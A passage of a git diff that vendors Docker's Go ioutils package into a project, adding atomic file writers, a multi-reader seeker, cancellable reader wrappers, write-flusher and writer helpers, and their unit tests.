BenchmarkBytesPipeRead(b *testing.B) { + rd := make([]byte, 512) + for i := 0; i < b.N; i++ { + b.StopTimer() + buf := NewBytesPipe() + for j := 0; j < 500; j++ { + buf.Write(make([]byte, 1024)) + } + b.StartTimer() + for j := 0; j < 1000; j++ { + if n, _ := buf.Read(rd); n != 512 { + b.Fatalf("Wrong number of bytes: %d", n) + } + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go new file mode 100644 index 0000000000..0b04b0ba3e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go @@ -0,0 +1,22 @@ +package ioutils + +import ( + "fmt" + "io" +) + +// FprintfIfNotEmpty prints the string value if it's not empty +func FprintfIfNotEmpty(w io.Writer, format, value string) (int, error) { + if value != "" { + return fmt.Fprintf(w, format, value) + } + return 0, nil +} + +// FprintfIfTrue prints the boolean value if it's true +func FprintfIfTrue(w io.Writer, format string, ok bool) (int, error) { + if ok { + return fmt.Fprintf(w, format, ok) + } + return 0, nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go new file mode 100644 index 0000000000..8968863296 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go @@ -0,0 +1,17 @@ +package ioutils + +import "testing" + +func TestFprintfIfNotEmpty(t *testing.T) { + wc := NewWriteCounter(&NopWriter{}) + n, _ := FprintfIfNotEmpty(wc, "foo%s", "") + + if wc.Count != 0 || n != 0 { + t.Errorf("Wrong count: %v vs. %v vs. 0", wc.Count, n) + } + + n, _ = FprintfIfNotEmpty(wc, "foo%s", "bar") + if wc.Count != 6 || n != 6 { + t.Errorf("Wrong count: %v vs. %v vs. 6", wc.Count, n) + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go new file mode 100644 index 0000000000..a56c462651 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go @@ -0,0 +1,162 @@ +package ioutils + +import ( + "io" + "io/ioutil" + "os" + "path/filepath" +) + +// NewAtomicFileWriter returns WriteCloser so that writing to it writes to a +// temporary file and closing it atomically changes the temporary file to +// destination path. Writing and closing concurrently is not allowed. +func NewAtomicFileWriter(filename string, perm os.FileMode) (io.WriteCloser, error) { + f, err := ioutil.TempFile(filepath.Dir(filename), ".tmp-"+filepath.Base(filename)) + if err != nil { + return nil, err + } + + abspath, err := filepath.Abs(filename) + if err != nil { + return nil, err + } + return &atomicFileWriter{ + f: f, + fn: abspath, + perm: perm, + }, nil +} + +// AtomicWriteFile atomically writes data to a file named by filename. +func AtomicWriteFile(filename string, data []byte, perm os.FileMode) error { + f, err := NewAtomicFileWriter(filename, perm) + if err != nil { + return err + } + n, err := f.Write(data) + if err == nil && n < len(data) { + err = io.ErrShortWrite + f.(*atomicFileWriter).writeErr = err + } + if err1 := f.Close(); err == nil { + err = err1 + } + return err +} + +type atomicFileWriter struct { + f *os.File + fn string + writeErr error + perm os.FileMode +} + +func (w *atomicFileWriter) Write(dt []byte) (int, error) { + n, err := w.f.Write(dt) + if err != nil { + w.writeErr = err + } + return n, err +} + +func (w *atomicFileWriter) Close() (retErr error) { + defer func() { + if retErr != nil || w.writeErr != nil { + os.Remove(w.f.Name()) + } + }() + if err := w.f.Sync(); err != nil { + w.f.Close() + return err + } + if err := w.f.Close(); err != nil { + return err + } + if err := os.Chmod(w.f.Name(), w.perm); err != nil { + return err + } + if w.writeErr == nil { + return os.Rename(w.f.Name(), w.fn) + } + return nil +} + +// AtomicWriteSet is used to atomically write a set +// of files and ensure they are visible at the same time. +// Must be committed to a new directory. +type AtomicWriteSet struct { + root string +} + +// NewAtomicWriteSet creates a new atomic write set to +// atomically create a set of files. The given directory +// is used as the base directory for storing files before +// commit. If no temporary directory is given the system +// default is used. +func NewAtomicWriteSet(tmpDir string) (*AtomicWriteSet, error) { + td, err := ioutil.TempDir(tmpDir, "write-set-") + if err != nil { + return nil, err + } + + return &AtomicWriteSet{ + root: td, + }, nil +} + +// WriteFile writes a file to the set, guaranteeing the file +// has been synced. +func (ws *AtomicWriteSet) WriteFile(filename string, data []byte, perm os.FileMode) error { + f, err := ws.FileWriter(filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm) + if err != nil { + return err + } + n, err := f.Write(data) + if err == nil && n < len(data) { + err = io.ErrShortWrite + } + if err1 := f.Close(); err == nil { + err = err1 + } + return err +} + +type syncFileCloser struct { + *os.File +} + +func (w syncFileCloser) Close() error { + err := w.File.Sync() + if err1 := w.File.Close(); err == nil { + err = err1 + } + return err +} + +// FileWriter opens a file writer inside the set. The file +// should be synced and closed before calling commit. +func (ws *AtomicWriteSet) FileWriter(name string, flag int, perm os.FileMode) (io.WriteCloser, error) { + f, err := os.OpenFile(filepath.Join(ws.root, name), flag, perm) + if err != nil { + return nil, err + } + return syncFileCloser{f}, nil +} + +// Cancel cancels the set and removes all temporary data +// created in the set. +func (ws *AtomicWriteSet) Cancel() error { + return os.RemoveAll(ws.root) +} + +// Commit moves all created files to the target directory. The +// target directory must not exist and the parent of the target +// directory must exist. +func (ws *AtomicWriteSet) Commit(target string) error { + return os.Rename(ws.root, target) +} + +// String returns the location the set is writing to. +func (ws *AtomicWriteSet) String() string { + return ws.root +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go new file mode 100644 index 0000000000..c4d1419306 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go @@ -0,0 +1,132 @@ +package ioutils + +import ( + "bytes" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" +) + +var ( + testMode os.FileMode = 0640 +) + +func init() { + // Windows does not support full Linux file mode + if runtime.GOOS == "windows" { + testMode = 0666 + } +} + +func TestAtomicWriteToFile(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "atomic-writers-test") + if err != nil { + t.Fatalf("Error when creating temporary directory: %s", err) + } + defer os.RemoveAll(tmpDir) + + expected := []byte("barbaz") + if err := AtomicWriteFile(filepath.Join(tmpDir, "foo"), expected, testMode); err != nil { + t.Fatalf("Error writing to file: %v", err) + } + + actual, err := ioutil.ReadFile(filepath.Join(tmpDir, "foo")) + if err != nil { + t.Fatalf("Error reading from file: %v", err) + } + + if bytes.Compare(actual, expected) != 0 { + t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) + } + + st, err := os.Stat(filepath.Join(tmpDir, "foo")) + if err != nil { + t.Fatalf("Error statting file: %v", err) + } + if expected := os.FileMode(testMode); st.Mode() != expected { + t.Fatalf("Mode mismatched, expected %o, got %o", expected, st.Mode()) + } +} + +func TestAtomicWriteSetCommit(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "atomic-writerset-test") + if err != nil { + t.Fatalf("Error when creating temporary directory: %s", err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(filepath.Join(tmpDir, "tmp"), 0700); err != nil { + t.Fatalf("Error creating tmp directory: %s", err) + } + + targetDir := filepath.Join(tmpDir, "target") + ws, err := NewAtomicWriteSet(filepath.Join(tmpDir, "tmp")) + if err != nil { + t.Fatalf("Error creating atomic write set: %s", err) + } + + expected := []byte("barbaz") + if err := ws.WriteFile("foo", expected, testMode); err != nil { + t.Fatalf("Error writing to file: %v", err) + } + + if _, err := ioutil.ReadFile(filepath.Join(targetDir, "foo")); err == nil { + t.Fatalf("Expected error reading file where should not exist") + } + + if err := ws.Commit(targetDir); err != nil { + t.Fatalf("Error committing file: %s", err) + } + + actual, err := ioutil.ReadFile(filepath.Join(targetDir, "foo")) + if err != nil { + t.Fatalf("Error reading from file: %v", err) + } + + if bytes.Compare(actual, expected) != 0 { + t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) + } + + st, err := os.Stat(filepath.Join(targetDir, "foo")) + if err != nil { + t.Fatalf("Error statting file: %v", err) + } + if expected := os.FileMode(testMode); st.Mode() != expected { + t.Fatalf("Mode mismatched, expected %o, got %o", expected, st.Mode()) + } + +} + +func TestAtomicWriteSetCancel(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "atomic-writerset-test") + if err != nil { + t.Fatalf("Error when creating temporary directory: %s", err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(filepath.Join(tmpDir, "tmp"), 0700); err != nil { + t.Fatalf("Error creating tmp directory: %s", err) + } + + ws, err := NewAtomicWriteSet(filepath.Join(tmpDir, "tmp")) + if err != nil { + t.Fatalf("Error creating atomic write set: %s", err) + } + + expected := []byte("barbaz") + if err := ws.WriteFile("foo", expected, testMode); err != nil { + t.Fatalf("Error writing to file: %v", err) + } + + if err := ws.Cancel(); err != nil { + t.Fatalf("Error committing file: %s", err) + } + + if _, err := ioutil.ReadFile(filepath.Join(tmpDir, "target", "foo")); err == nil { + t.Fatalf("Expected error reading file where should not exist") + } else if !os.IsNotExist(err) { + t.Fatalf("Unexpected error reading file: %s", err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go b/vendor/github.com/docker/docker/pkg/ioutils/multireader.go new file mode 100644 index 0000000000..d7b97486c6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/multireader.go @@ -0,0 +1,223 @@ +package ioutils + +import ( + "bytes" + "fmt" + "io" + "os" +) + +type pos struct { + idx int + offset int64 +} + +type multiReadSeeker struct { + readers []io.ReadSeeker + pos *pos + posIdx map[io.ReadSeeker]int +} + +func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) { + var tmpOffset int64 + switch whence { + case os.SEEK_SET: + for i, rdr := range r.readers { + // get size of the current reader + s, err := rdr.Seek(0, os.SEEK_END) + if err != nil { + return -1, err + } + + if offset > tmpOffset+s { + if i == len(r.readers)-1 { + rdrOffset := s + (offset - tmpOffset) + if _, err := rdr.Seek(rdrOffset, os.SEEK_SET); err != nil { + return -1, err + } + r.pos = &pos{i, rdrOffset} + return offset, nil + } + + tmpOffset += s + continue + } + + rdrOffset := offset - tmpOffset + idx := i + + rdr.Seek(rdrOffset, os.SEEK_SET) + // make sure all following readers are at 0 + for _, rdr := range r.readers[i+1:] { + rdr.Seek(0, os.SEEK_SET) + } + + if rdrOffset == s && i != len(r.readers)-1 { + idx++ + rdrOffset = 0 + } + r.pos = &pos{idx, rdrOffset} + return offset, nil + } + case os.SEEK_END: + for _, rdr := range r.readers { + s, err := rdr.Seek(0, os.SEEK_END) + if err != nil { + return -1, err + } + tmpOffset += s + } + r.Seek(tmpOffset+offset, os.SEEK_SET) + return tmpOffset + offset, nil + case os.SEEK_CUR: + if r.pos == nil { + return r.Seek(offset, os.SEEK_SET) + } + // Just return the current offset + if offset == 0 { + return r.getCurOffset() + } + + curOffset, err := r.getCurOffset() + if err != nil { + return -1, err + } + rdr, rdrOffset, err := r.getReaderForOffset(curOffset + offset) + if err != nil { + return -1, err + } + + r.pos = &pos{r.posIdx[rdr], rdrOffset} + return curOffset + offset, nil + default: + return -1, fmt.Errorf("Invalid whence: %d", whence) + } + + return -1, fmt.Errorf("Error seeking for whence: %d, offset: %d", whence, offset) +} + +func (r *multiReadSeeker) getReaderForOffset(offset int64) (io.ReadSeeker, int64, error) { + + var offsetTo int64 + + for _, rdr := range r.readers { + size, err := getReadSeekerSize(rdr) + if err != nil { + return nil, -1, err + } + if offsetTo+size > offset { + return rdr, offset - offsetTo, nil + } + if rdr == r.readers[len(r.readers)-1] { + return rdr, offsetTo + offset, nil + } + offsetTo += size + } + + return nil, 0, nil +} + +func (r *multiReadSeeker) getCurOffset() (int64, error) { + var totalSize int64 + for _, rdr := range r.readers[:r.pos.idx+1] { + if r.posIdx[rdr] == r.pos.idx { + totalSize += r.pos.offset + break + } + + size, err := getReadSeekerSize(rdr) + if err != nil { + return -1, fmt.Errorf("error getting seeker size: %v", err) + } + totalSize += size + } + return totalSize, nil +} + +func (r *multiReadSeeker) getOffsetToReader(rdr io.ReadSeeker) (int64, error) { + var offset int64 + for _, r := range r.readers { + if r == rdr { + break + } + + size, err := getReadSeekerSize(rdr) + if err != nil { + return -1, err + } + offset += size + } + return offset, nil +} + +func (r *multiReadSeeker) Read(b []byte) (int, error) { + if r.pos == nil { + r.pos = &pos{0, 0} + } + + bLen := int64(len(b)) + buf := bytes.NewBuffer(nil) + var rdr io.ReadSeeker + + for _, rdr = range r.readers[r.pos.idx:] { + readBytes, err := io.CopyN(buf, rdr, bLen) + if err != nil && err != io.EOF { + return -1, err + } + bLen -= readBytes + + if bLen == 0 { + break + } + } + + rdrPos, err := rdr.Seek(0, os.SEEK_CUR) + if err != nil { + return -1, err + } + r.pos = &pos{r.posIdx[rdr], rdrPos} + return buf.Read(b) +} + +func getReadSeekerSize(rdr io.ReadSeeker) (int64, error) { + // save the current position + pos, err := rdr.Seek(0, os.SEEK_CUR) + if err != nil { + return -1, err + } + + // get the size + size, err := rdr.Seek(0, os.SEEK_END) + if err != nil { + return -1, err + } + + // reset the position + if _, err := rdr.Seek(pos, os.SEEK_SET); err != nil { + return -1, err + } + return size, nil +} + +// MultiReadSeeker returns a ReadSeeker that's the logical concatenation of the provided +// input readseekers. After calling this method the initial position is set to the +// beginning of the first ReadSeeker. At the end of a ReadSeeker, Read always advances +// to the beginning of the next ReadSeeker and returns EOF at the end of the last ReadSeeker. +// Seek can be used over the sum of lengths of all readseekers. +// +// When a MultiReadSeeker is used, no Read and Seek operations should be made on +// its ReadSeeker components. Also, users should make no assumption on the state +// of individual readseekers while the MultiReadSeeker is used. +func MultiReadSeeker(readers ...io.ReadSeeker) io.ReadSeeker { + if len(readers) == 1 { + return readers[0] + } + idx := make(map[io.ReadSeeker]int) + for i, rdr := range readers { + idx[rdr] = i + } + return &multiReadSeeker{ + readers: readers, + posIdx: idx, + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go b/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go new file mode 100644 index 0000000000..65309a9565 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go @@ -0,0 +1,211 @@ +package ioutils + +import ( + "bytes" + "encoding/binary" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + "testing" +) + +func TestMultiReadSeekerReadAll(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + expectedSize := int64(s1.Len() + s2.Len() + s3.Len()) + + b, err := ioutil.ReadAll(mr) + if err != nil { + t.Fatal(err) + } + + expected := "hello world 1hello world 2hello world 3" + if string(b) != expected { + t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) + } + + size, err := mr.Seek(0, os.SEEK_END) + if err != nil { + t.Fatal(err) + } + if size != expectedSize { + t.Fatalf("reader size does not match, got %d, expected %d", size, expectedSize) + } + + // Reset the position and read again + pos, err := mr.Seek(0, os.SEEK_SET) + if err != nil { + t.Fatal(err) + } + if pos != 0 { + t.Fatalf("expected position to be set to 0, got %d", pos) + } + + b, err = ioutil.ReadAll(mr) + if err != nil { + t.Fatal(err) + } + + if string(b) != expected { + t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) + } +} + +func TestMultiReadSeekerReadEach(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + var totalBytes int64 + for i, s := range []*strings.Reader{s1, s2, s3} { + sLen := int64(s.Len()) + buf := make([]byte, s.Len()) + expected := []byte(fmt.Sprintf("%s %d", str, i+1)) + + if _, err := mr.Read(buf); err != nil && err != io.EOF { + t.Fatal(err) + } + + if !bytes.Equal(buf, expected) { + t.Fatalf("expected %q to be %q", string(buf), string(expected)) + } + + pos, err := mr.Seek(0, os.SEEK_CUR) + if err != nil { + t.Fatalf("iteration: %d, error: %v", i+1, err) + } + + // check that the total bytes read is the current position of the seeker + totalBytes += sLen + if pos != totalBytes { + t.Fatalf("expected current position to be: %d, got: %d, iteration: %d", totalBytes, pos, i+1) + } + + // This tests not only that SEEK_SET and SEEK_CUR give the same values, but that the next iteration is in the expected position as well + newPos, err := mr.Seek(pos, os.SEEK_SET) + if err != nil { + t.Fatal(err) + } + if newPos != pos { + t.Fatalf("expected to get same position when calling SEEK_SET with value from SEEK_CUR, cur: %d, set: %d", pos, newPos) + } + } +} + +func TestMultiReadSeekerReadSpanningChunks(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + buf := make([]byte, s1.Len()+3) + _, err := mr.Read(buf) + if err != nil { + t.Fatal(err) + } + + // expected is the contents of s1 + 3 bytes from s2, ie, the `hel` at the end of this string + expected := "hello world 1hel" + if string(buf) != expected { + t.Fatalf("expected %s to be %s", string(buf), expected) + } +} + +func TestMultiReadSeekerNegativeSeek(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + s1Len := s1.Len() + s2Len := s2.Len() + s3Len := s3.Len() + + s, err := mr.Seek(int64(-1*s3.Len()), os.SEEK_END) + if err != nil { + t.Fatal(err) + } + if s != int64(s1Len+s2Len) { + t.Fatalf("expected %d to be %d", s, s1.Len()+s2.Len()) + } + + buf := make([]byte, s3Len) + if _, err := mr.Read(buf); err != nil && err != io.EOF { + t.Fatal(err) + } + expected := fmt.Sprintf("%s %d", str, 3) + if string(buf) != fmt.Sprintf("%s %d", str, 3) { + t.Fatalf("expected %q to be %q", string(buf), expected) + } +} + +func TestMultiReadSeekerCurAfterSet(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + mid := int64(s1.Len() + s2.Len()/2) + + size, err := mr.Seek(mid, os.SEEK_SET) + if err != nil { + t.Fatal(err) + } + if size != mid { + t.Fatalf("reader size does not match, got %d, expected %d", size, mid) + } + + size, err = mr.Seek(3, os.SEEK_CUR) + if err != nil { + t.Fatal(err) + } + if size != mid+3 { + t.Fatalf("reader size does not match, got %d, expected %d", size, mid+3) + } + size, err = mr.Seek(5, os.SEEK_CUR) + if err != nil { + t.Fatal(err) + } + if size != mid+8 { + t.Fatalf("reader size does not match, got %d, expected %d", size, mid+8) + } + + size, err = mr.Seek(10, os.SEEK_CUR) + if err != nil { + t.Fatal(err) + } + if size != mid+18 { + t.Fatalf("reader size does not match, got %d, expected %d", size, mid+18) + } +} + +func TestMultiReadSeekerSmallReads(t *testing.T) { + readers := []io.ReadSeeker{} + for i := 0; i < 10; i++ { + integer := make([]byte, 4, 4) + binary.BigEndian.PutUint32(integer, uint32(i)) + readers = append(readers, bytes.NewReader(integer)) + } + + reader := MultiReadSeeker(readers...) + for i := 0; i < 10; i++ { + var integer uint32 + if err := binary.Read(reader, binary.BigEndian, &integer); err != nil { + t.Fatalf("Read from NewMultiReadSeeker failed: %v", err) + } + if uint32(i) != integer { + t.Fatalf("Read wrong value from NewMultiReadSeeker: %d != %d", i, integer) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers.go b/vendor/github.com/docker/docker/pkg/ioutils/readers.go new file mode 100644 index 0000000000..63f3c07f46 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers.go @@ -0,0 +1,154 @@ +package ioutils + +import ( + "crypto/sha256" + "encoding/hex" + "io" + + "golang.org/x/net/context" +) + +type readCloserWrapper struct { + io.Reader + closer func() error +} + +func (r *readCloserWrapper) Close() error { + return r.closer() +} + +// NewReadCloserWrapper returns a new io.ReadCloser. +func NewReadCloserWrapper(r io.Reader, closer func() error) io.ReadCloser { + return &readCloserWrapper{ + Reader: r, + closer: closer, + } +} + +type readerErrWrapper struct { + reader io.Reader + closer func() +} + +func (r *readerErrWrapper) Read(p []byte) (int, error) { + n, err := r.reader.Read(p) + if err != nil { + r.closer() + } + return n, err +} + +// NewReaderErrWrapper returns a new io.Reader. +func NewReaderErrWrapper(r io.Reader, closer func()) io.Reader { + return &readerErrWrapper{ + reader: r, + closer: closer, + } +} + +// HashData returns the sha256 sum of src. +func HashData(src io.Reader) (string, error) { + h := sha256.New() + if _, err := io.Copy(h, src); err != nil { + return "", err + } + return "sha256:" + hex.EncodeToString(h.Sum(nil)), nil +} + +// OnEOFReader wraps an io.ReadCloser and a function +// the function will run at the end of file or close the file. +type OnEOFReader struct { + Rc io.ReadCloser + Fn func() +} + +func (r *OnEOFReader) Read(p []byte) (n int, err error) { + n, err = r.Rc.Read(p) + if err == io.EOF { + r.runFunc() + } + return +} + +// Close closes the file and run the function. +func (r *OnEOFReader) Close() error { + err := r.Rc.Close() + r.runFunc() + return err +} + +func (r *OnEOFReader) runFunc() { + if fn := r.Fn; fn != nil { + fn() + r.Fn = nil + } +} + +// cancelReadCloser wraps an io.ReadCloser with a context for cancelling read +// operations. +type cancelReadCloser struct { + cancel func() + pR *io.PipeReader // Stream to read from + pW *io.PipeWriter +} + +// NewCancelReadCloser creates a wrapper that closes the ReadCloser when the +// context is cancelled. The returned io.ReadCloser must be closed when it is +// no longer needed. +func NewCancelReadCloser(ctx context.Context, in io.ReadCloser) io.ReadCloser { + pR, pW := io.Pipe() + + // Create a context used to signal when the pipe is closed + doneCtx, cancel := context.WithCancel(context.Background()) + + p := &cancelReadCloser{ + cancel: cancel, + pR: pR, + pW: pW, + } + + go func() { + _, err := io.Copy(pW, in) + select { + case <-ctx.Done(): + // If the context was closed, p.closeWithError + // was already called. Calling it again would + // change the error that Read returns. + default: + p.closeWithError(err) + } + in.Close() + }() + go func() { + for { + select { + case <-ctx.Done(): + p.closeWithError(ctx.Err()) + case <-doneCtx.Done(): + return + } + } + }() + + return p +} + +// Read wraps the Read method of the pipe that provides data from the wrapped +// ReadCloser. +func (p *cancelReadCloser) Read(buf []byte) (n int, err error) { + return p.pR.Read(buf) +} + +// closeWithError closes the wrapper and its underlying reader. It will +// cause future calls to Read to return err. +func (p *cancelReadCloser) closeWithError(err error) { + p.pW.CloseWithError(err) + p.cancel() +} + +// Close closes the wrapper its underlying reader. It will cause +// future calls to Read to return io.EOF. +func (p *cancelReadCloser) Close() error { + p.closeWithError(io.EOF) + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go new file mode 100644 index 0000000000..9abc1054df --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go @@ -0,0 +1,94 @@ +package ioutils + +import ( + "fmt" + "io/ioutil" + "strings" + "testing" + "time" + + "golang.org/x/net/context" +) + +// Implement io.Reader +type errorReader struct{} + +func (r *errorReader) Read(p []byte) (int, error) { + return 0, fmt.Errorf("Error reader always fail.") +} + +func TestReadCloserWrapperClose(t *testing.T) { + reader := strings.NewReader("A string reader") + wrapper := NewReadCloserWrapper(reader, func() error { + return fmt.Errorf("This will be called when closing") + }) + err := wrapper.Close() + if err == nil || !strings.Contains(err.Error(), "This will be called when closing") { + t.Fatalf("readCloserWrapper should have call the anonymous func and thus, fail.") + } +} + +func TestReaderErrWrapperReadOnError(t *testing.T) { + called := false + reader := &errorReader{} + wrapper := NewReaderErrWrapper(reader, func() { + called = true + }) + _, err := wrapper.Read([]byte{}) + if err == nil || !strings.Contains(err.Error(), "Error reader always fail.") { + t.Fatalf("readErrWrapper should returned an error") + } + if !called { + t.Fatalf("readErrWrapper should have call the anonymous function on failure") + } +} + +func TestReaderErrWrapperRead(t *testing.T) { + reader := strings.NewReader("a string reader.") + wrapper := NewReaderErrWrapper(reader, func() { + t.Fatalf("readErrWrapper should not have called the anonymous function") + }) + // Read 20 byte (should be ok with the string above) + num, err := wrapper.Read(make([]byte, 20)) + if err != nil { + t.Fatal(err) + } + if num != 16 { + t.Fatalf("readerErrWrapper should have read 16 byte, but read %d", num) + } +} + +func TestHashData(t *testing.T) { + reader := strings.NewReader("hash-me") + actual, err := HashData(reader) + if err != nil { + t.Fatal(err) + } + expected := "sha256:4d11186aed035cc624d553e10db358492c84a7cd6b9670d92123c144930450aa" + if actual != expected { + t.Fatalf("Expecting %s, got %s", expected, actual) + } +} + +type perpetualReader struct{} + +func (p *perpetualReader) Read(buf []byte) (n int, err error) { + for i := 0; i != len(buf); i++ { + buf[i] = 'a' + } + return len(buf), nil +} + +func TestCancelReadCloser(t *testing.T) { + ctx, _ := context.WithTimeout(context.Background(), 100*time.Millisecond) + cancelReadCloser := NewCancelReadCloser(ctx, ioutil.NopCloser(&perpetualReader{})) + for { + var buf [128]byte + _, err := cancelReadCloser.Read(buf[:]) + if err == context.DeadlineExceeded { + break + } else if err != nil { + t.Fatalf("got unexpected error: %v", err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go new file mode 100644 index 0000000000..1539ad21b5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go @@ -0,0 +1,10 @@ +// +build !windows + +package ioutils + +import "io/ioutil" + +// TempDir on Unix systems is equivalent to ioutil.TempDir. +func TempDir(dir, prefix string) (string, error) { + return ioutil.TempDir(dir, prefix) +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go new file mode 100644 index 0000000000..c258e5fdd8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go @@ -0,0 +1,18 @@ +// +build windows + +package ioutils + +import ( + "io/ioutil" + + "github.com/docker/docker/pkg/longpath" +) + +// TempDir is the equivalent of ioutil.TempDir, except that the result is in Windows longpath format. +func TempDir(dir, prefix string) (string, error) { + tempDir, err := ioutil.TempDir(dir, prefix) + if err != nil { + return "", err + } + return longpath.AddPrefix(tempDir), nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go new file mode 100644 index 0000000000..52a4901ade --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go @@ -0,0 +1,92 @@ +package ioutils + +import ( + "io" + "sync" +) + +// WriteFlusher wraps the Write and Flush operation ensuring that every write +// is a flush. In addition, the Close method can be called to intercept +// Read/Write calls if the targets lifecycle has already ended. +type WriteFlusher struct { + w io.Writer + flusher flusher + flushed chan struct{} + flushedOnce sync.Once + closed chan struct{} + closeLock sync.Mutex +} + +type flusher interface { + Flush() +} + +var errWriteFlusherClosed = io.EOF + +func (wf *WriteFlusher) Write(b []byte) (n int, err error) { + select { + case <-wf.closed: + return 0, errWriteFlusherClosed + default: + } + + n, err = wf.w.Write(b) + wf.Flush() // every write is a flush. + return n, err +} + +// Flush the stream immediately. +func (wf *WriteFlusher) Flush() { + select { + case <-wf.closed: + return + default: + } + + wf.flushedOnce.Do(func() { + close(wf.flushed) + }) + wf.flusher.Flush() +} + +// Flushed returns the state of flushed. +// If it's flushed, return true, or else it return false. +func (wf *WriteFlusher) Flushed() bool { + // BUG(stevvooe): Remove this method. Its use is inherently racy. Seems to + // be used to detect whether or a response code has been issued or not. + // Another hook should be used instead. + var flushed bool + select { + case <-wf.flushed: + flushed = true + default: + } + return flushed +} + +// Close closes the write flusher, disallowing any further writes to the +// target. After the flusher is closed, all calls to write or flush will +// result in an error. +func (wf *WriteFlusher) Close() error { + wf.closeLock.Lock() + defer wf.closeLock.Unlock() + + select { + case <-wf.closed: + return errWriteFlusherClosed + default: + close(wf.closed) + } + return nil +} + +// NewWriteFlusher returns a new WriteFlusher. +func NewWriteFlusher(w io.Writer) *WriteFlusher { + var fl flusher + if f, ok := w.(flusher); ok { + fl = f + } else { + fl = &NopFlusher{} + } + return &WriteFlusher{w: w, flusher: fl, closed: make(chan struct{}), flushed: make(chan struct{})} +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers.go b/vendor/github.com/docker/docker/pkg/ioutils/writers.go new file mode 100644 index 0000000000..ccc7f9c23e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers.go @@ -0,0 +1,66 @@ +package ioutils + +import "io" + +// NopWriter represents a type which write operation is nop. +type NopWriter struct{} + +func (*NopWriter) Write(buf []byte) (int, error) { + return len(buf), nil +} + +type nopWriteCloser struct { + io.Writer +} + +func (w *nopWriteCloser) Close() error { return nil } + +// NopWriteCloser returns a nopWriteCloser. +func NopWriteCloser(w io.Writer) io.WriteCloser { + return &nopWriteCloser{w} +} + +// NopFlusher represents a type which flush operation is nop. +type NopFlusher struct{} + +// Flush is a nop operation. +func (f *NopFlusher) Flush() {} + +type writeCloserWrapper struct { + io.Writer + closer func() error +} + +func (r *writeCloserWrapper) Close() error { + return r.closer() +} + +// NewWriteCloserWrapper returns a new io.WriteCloser. +func NewWriteCloserWrapper(r io.Writer, closer func() error) io.WriteCloser { + return &writeCloserWrapper{ + Writer: r, + closer: closer, + } +} + +// WriteCounter wraps a concrete io.Writer and hold a count of the number +// of bytes written to the writer during a "session". +// This can be convenient when write return is masked +// (e.g., json.Encoder.Encode()) +type WriteCounter struct { + Count int64 + Writer io.Writer +} + +// NewWriteCounter returns a new WriteCounter. +func NewWriteCounter(w io.Writer) *WriteCounter { + return &WriteCounter{ + Writer: w, + } +} + +func (wc *WriteCounter) Write(p []byte) (count int, err error) { + count, err = 